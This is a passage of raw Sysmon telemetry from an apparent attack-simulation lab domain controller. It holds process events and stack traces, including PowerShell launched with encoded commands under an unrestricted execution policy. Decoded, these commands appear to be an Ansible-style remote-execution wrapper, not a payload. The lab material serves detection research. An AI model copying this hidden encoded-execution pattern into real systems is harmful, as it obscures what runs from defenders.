Images_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c54bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c54bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6b72d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c33f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c3120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6c2df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd1746d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6a9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc6a9222(wow64) 154100x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:23.014{10ACEC4A-8517-5FCF-C402-000000009001}4156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8516-5FCF-1C60-100000000000}0x10601c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8516-5FCF-C302-000000009001}4760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.665{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8518-5FCF-CD02-000000009001}4472C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.665{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.665{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.665{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-CD02-000000009001}4472C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-8518-5FCF-CC02-000000009001}49044468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8518-5FCF-CD02-000000009001}4472C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2d2519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc73398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc791e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc77534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7672d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7733fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759225(wow64) 154100x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.663{10ACEC4A-8518-5FCF-CD02-000000009001}4472C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 